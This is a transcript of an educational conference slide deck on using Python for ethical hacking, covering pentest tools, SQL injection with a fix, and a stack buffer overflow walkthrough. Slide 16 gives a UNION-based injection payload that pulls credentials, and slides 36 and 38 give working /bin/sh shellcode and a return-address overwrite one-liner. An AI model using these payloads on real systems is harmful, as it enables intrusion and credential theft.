Slide 1

Slide 1 text

The Importance of Python for Ethical Hacking Created by Yahya for PyCon ID 2021

Slide 2

Slide 2 text

!! DISCLAIMER !!
- Everything in this presentation is for informational and educational purposes only, for those who are willing and curious to learn about Ethical Hacking, Security and Penetration Testing.
- Wherever the word "Hacking" is used in this presentation it shall be regarded as Ethical Hacking. The author does not promote hacking or cracking.
- Do not attempt to violate the law with anything contained here.
- You shall not misuse this information to gain unauthorised access. You may try these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal.

Thanks to my wife and my friend who made this presentation happen.

Slide 3

Slide 3 text

Hello! I am Yahya F. Alfatih. Engineer Lead at eFishery. Love to automate anything. DevOps, SoftEng & CyberSec researcher. OSS & Web3 enthusiast. Creator of NeMo, BigBrother Test and other junk. A lazy, abnormal tech savvy. Handles: buk4nyahya, @BukanYahya, k1m0ch1

Slide 4

Slide 4 text

2021 Hacking? A $2M bug bounty: a profitable profession working on the internet (https://decrypt.co/83997/polygon-dodges-850m-hack-pays-record-2m-bounty). Cybercrime-as-a-service: crime as easy as managing a spreadsheet.

Slide 5

Slide 5 text


Slide 6

Slide 6 text

Hacking & Ethical Hacking: the difference is whether the hacker's activity follows a code of ethics or not. Easy + Hack = Python: the one language hackers commonly find easy to use.

Slide 7

Slide 7 text

Do hackers really use Python? Really?

Slide 8

Slide 8 text

Language used for exploits on exploit-db.com (from 45k records):
- Java: 64
- PHP: 1144
- HTML: 1894
- Perl: 2822
- C: 2956
- Python: 3870
- Text: 1999+

Slide 9

Slide 9 text

Pentesting tools on GitHub are commonly written in Python.

Slide 10

Slide 10 text

Proof-of-concept code for CVEs is also widely written in Python.

Slide 11

Slide 11 text

So why do hackers commonly use Python?
- Hacking Tools: it is used by SQLMap, theHarvester and MobSF.
- Productive & Speedy: one of the most accessible programming languages available.
- Wide Community: the hacker community can really help with Python.
- Easy PoC: it's not hard to write a proof of concept for a vulnerability or CVE.
- ByteCode Shell Inject: fun with buffer overflows? Try Python.
- For Fun! 🤣🤣🤣🤣

Slide 12

Slide 12 text

Hacking Tools: Python as the Swiss army knife of hacker tools.

Slide 13

Slide 13 text

Common hacker tools written in Python: SQLMap, theHarvester, MobSF. These tools are very common among hackers for SQL injection, OSINT and debugging Android apps.

Slide 14

Slide 14 text

SQLMap - automatic SQL injection and database takeover. This tool can detect every variant of SQL injection with more than 100 SQL injection payloads, and it has many more features than that, from exploring the database to dumping it.

Slide 15

Slide 15 text

SQL injection is an attack method hackers usually use to trick the application into executing arbitrary commands on the database. It starts from a query that simply selects a news item, like this:

select * from news where news_id=5

Slide 16

Slide 16 text

SQL injection turns it into something that selects from another table, one that stores more sensitive information, like this:

select * from news where news_id=5 union select 1,2,concat(username,0x3a,password),4,5 from credentials

This is only one variant of SQL injection out of the 9 variants with more than 100 SQL injection payloads; you can see the full list here: https://github.com/payloadbox/sql-injection-payload-list

Slide 17

Slide 17 text

Fix SQL injection: because SQL injection almost always involves data input, it is only necessary to sanitize the input so that hackers can't manipulate the query.
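As an added example that is not part of the talk, the vulnerable query pattern from slide 15 beside the fix, in Python with an in-memory SQLite database: the input is validated as an integer and then bound as a query parameter. The union payload is the one from slide 16 rewritten in SQLite syntax (|| instead of MySQL concat/0x3a); the table layouts and sample rows are constructed for this demo.

```python
import sqlite3

# Constructed sample tables standing in for the "news" and "credentials" tables
# in the slides; the data is made up for this demo.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(news_id INTEGER, title TEXT, body TEXT, author TEXT, created TEXT);
        CREATE TABLE credentials(username TEXT, password TEXT);
        INSERT INTO news VALUES (5, 'PyCon ID 2021', 'Python for ethical hacking', 'yahya', '2021-12-04');
        INSERT INTO credentials VALUES ('admin', 'hunter2');
    """)
    return conn

def get_news_vulnerable(conn, news_id):
    # The pattern the slides attack: the input is glued straight into the query
    # text, so whatever the user sends becomes part of the SQL statement.
    query = "select * from news where news_id=" + str(news_id)
    return conn.execute(query).fetchall()

def get_news_fixed(conn, news_id):
    # "Sanitize the input": reject anything that is not an integer, then bind the
    # value as a parameter so the database never parses user text as SQL.
    news_id = int(news_id)  # raises ValueError for the union payload
    return conn.execute("select * from news where news_id=?", (news_id,)).fetchall()

# The union payload from slide 16 in SQLite syntax (constructed for this demo).
PAYLOAD = "5 union select 1,2,username||':'||password,4,5 from credentials"

def demo():
    """Return (rows leaked by the vulnerable query, whether the fixed query rejected it)."""
    conn = make_db()
    leaked = get_news_vulnerable(conn, PAYLOAD)
    try:
        get_news_fixed(conn, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked

if __name__ == "__main__":
    rows, blocked = demo()
    for row in rows:
        print(row)
    print("fixed query rejected the payload:", blocked)
```

The vulnerable query returns the news row plus a second row carrying admin:hunter2 from the credentials table, while the fixed version refuses the payload before it ever reaches the database.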

Slide 18

Slide 18 text

theHarvester - the internet gold miner tool. This is a very cool tool for digging a gold mine on the internet. The tool is simple: you just give it a domain and it will search for "ANY" information about it on the internet, even sensitive information. How does it work? It only uses search engines, from the common ones (Google, DuckDuckGo, Bing) to the specialised ones (GHDB, Shodan and ZoomEye); all of this is commonly called OSINT.

Slide 19

Slide 19 text

OSINT - Open Source Intelligence. A process mostly used for collecting publicly available sources in an intelligence context; you can try it by simply using specific keywords on Google, which hackers usually call GHDB (Google Hacking DB). Professionally, a person who does this is called an investigator.

Slide 20

Slide 20 text

OSINT - Open Source Intelligence. Why is OSINT so powerful?

Slide 21

Slide 21 text

MobSF - Mobile Security Framework. This tool can analyze and decompile an Android application, sniff its API calls and do many other things to analyze it. It has two great features: Static Analysis and Dynamic Analysis.

Slide 22

Slide 22 text

How powerful is MobSF? I made the analysis of the Peduli Lindungi application on Twitter, GitHub and YouTube, showing that the Peduli Lindungi application actually sends "unusual" data to an "untrusted tracker".

Slide 23

Slide 23 text

Automate & Proof of Concept: it's easy to automate using Python.

Slide 24

Slide 24 text

Mentimeter - an interactive tool for voting. Some people or groups love to use this tool for interactive voting or just for some fun with a group.

Slide 25

Slide 25 text

Incognito browser to trick the sessions.

Slide 26

Slide 26 text

Just request a new identifier.

Slide 27

Slide 27 text

JEMAWA - menti spammer: https://github.com/k1m0ch1/jemawa-menti-choices-spammer

Slide 28

Slide 28 text

Inject shellcode into a stack buffer overflow. Python is pretty handy for injecting some binary code into memory.

Slide 29

Slide 29 text

[Diagram: process memory layout from high addresses (0xffffff...) down to low addresses (0x000...): kernel, stack, heap, data, text. Zoomed-in stack frame of int main(): parameters, return address, base pointer, buffer(80).]

Slide 30

Slide 30 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)), with 8 bytes written into the buffer: 0x70 = p, 0x61 = a, 0x73 = s, 0x73 = s, 0x77 = w, 0x6f = o, 0x72 = r, 0x64 = d.]

Slide 31

Slide 31 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)).]

Slide 32

Slide 32 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)).]

Slide 33

Slide 33 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)), with the buffer occupying 0x7fffffffe490 - 0x7fffffffe4d8.]

Slide 34

Slide 34 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)).]

Slide 35

Slide 35 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)).]

Slide 36

Slide 36 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)), with the 27-byte /bin/sh shellcode placed at 0x7fffffffed60: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05 (http://shell-storm.org/shellcode/files/shellcode-806.php)]

$(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A" * 63')

Slide 37

Slide 37 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)).]

Slide 38

Slide 38 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)), with the return address overwritten by the memory address 0x7fffffffe480, written as the bytes \x80\xe4\xff\xff\xff\x7f.]

$(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A" * 61 + "\x80\xe4\xff\xff\xff\x7f"')

Slide 39

Slide 39 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)), with the return address pointing at 0x7fffffffe480.]

Slide 40

Slide 40 text

[Diagram: the same main() stack frame (parameters, return address, base pointer, buffer(80)), with the return address pointing at 0x7fffffffe480.]

Slide 41

Slide 41 text

Demo: the client-server buffer overflow, using Python.

Slide 42

Slide 42 text

For Fun! The Strawberry Juice Day: everything is strawberry juice!!

Slide 43

Slide 43 text

Status Quo

Slide 44

Slide 44 text

Call to the Adventure: private network and public network in the same network.

Slide 45

Slide 45 text

Refusal of the call

Slide 46

Slide 46 text

Meeting with the Mentor (MITM Attack)

Slide 47

Slide 47 text

Crossing the threshold

Slide 48

Slide 48 text


Slide 49

Slide 49 text

Test, Allies, Enemies

Slide 50

Slide 50 text

Test, Allies, Enemies

Slide 51

Slide 51 text

Test, Allies, Enemies

Slide 52

Slide 52 text

Approach the innermost cave

Slide 53

Slide 53 text

Ordeal

Slide 54

Slide 54 text

Ordeal

Slide 55

Slide 55 text

Ordeal

Slide 56

Slide 56 text

Reward

Slide 57

Slide 57 text

Reward

Slide 58

Slide 58 text

Road back

Slide 59

Slide 59 text

Return with elixir

Slide 60

Slide 60 text

The Bug and how to fix it:
1. A "REAL" separate network
2. HTTPS EVERYWHERE, even on the LAN
3. Token expiration

Slide 61

Slide 61 text

Hacking with Python is absolutely amazing

Slide 62

Slide 62 text

Thanks to!
- Computerphile (YouTube channel): YouTube videos about computer and internet stuff
- LiveOverflow (wannabe hacker): YouTube videos about various IT security topics
- Habibie Faried (hacker buddy): he writes good articles on Medium, https://habibiefaried.medium.com/
- sec_r0 (Gojek tech security engineer): he made a lot of cool stuff with his simple explanations

Slide 63

Slide 63 text

Thanks! ANY QUESTIONS? You can find me at [email protected], buk4nyahya, @BukanYahya, k1m0ch1, k1m0ch1